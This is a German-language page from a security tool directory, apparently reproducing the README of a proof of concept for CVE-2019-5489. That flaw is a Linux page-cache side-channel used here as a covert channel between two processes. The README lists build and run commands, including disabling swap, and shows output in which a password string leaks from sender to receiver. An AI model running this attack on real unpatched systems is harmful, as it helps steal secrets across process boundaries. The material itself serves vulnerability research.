Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-5489 — Page Cache Seitenkanalangriffe (CVE-2019-5489) Proof of Concept für Linux | Kitploit
Tools/GitHubGitHub/mmxsrup/cve-2019-5489
SchwachstellenanalyseExploitationInformationsbeschaffungPapers & ForschungLernen & BildungBinary-Exploitation
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Page Cache Seitenkanalangriffe (CVE-2019-5489) Proof of Concept für Linux

Repository anzeigen
1037vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE 2019-5489

Dieses Repository enthält den Proof-of-Concept für Page-Cache-Seitenkanal-Angriffe (CVE-2019-5489) für Linux.

Um den Page-Cache-Seitenkanal zu evaluieren, habe ich einen verdeckten Kanal zwischen zwei Prozessen implementiert. Der Senderprozess sendet vertrauliche Daten über den Page-Cache-Seitenkanal an einen Empfängerprozess. Page-Cache-Angriffe wurden in Linux-Kernel 5.0 und später entschärft, daher funktioniert dieser PoC nur vor Linux-Kernel 5.0.

HINWEIS: Ich habe es auf Ubuntu 18.04, Linux 4.15.0-70 getestet.

Erstellen

Führen Sie den folgenden Befehl aus.

git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

Ausführen

Deaktivieren Sie den Swap-Speicher, um den Angriff zu erleichtern.

swapoff -a

Terminal 1

Führen Sie zunächst den folgenden Befehl in Terminal 1 aus.

make run-sender

Terminal 2

Nachdem sending 1th character ... in Terminal 1 ausgegeben wurde, führen Sie den folgenden Befehl aus.

make run-receiver

Ausgabe

Wenn die Ausführung erfolgreich ist, wird Folgendes ausgegeben.
Dies zeigt, dass der Schlüssel über den Page-Cache-Seitenkanal vom Senderprozess an den Empfängerprozess gesendet wurde.

Terminal 1

LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

Terminal 2

LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

Referenzen

  • Daniel Gruss et al. Page cache attacks [CCS 19]
Tool herunterladen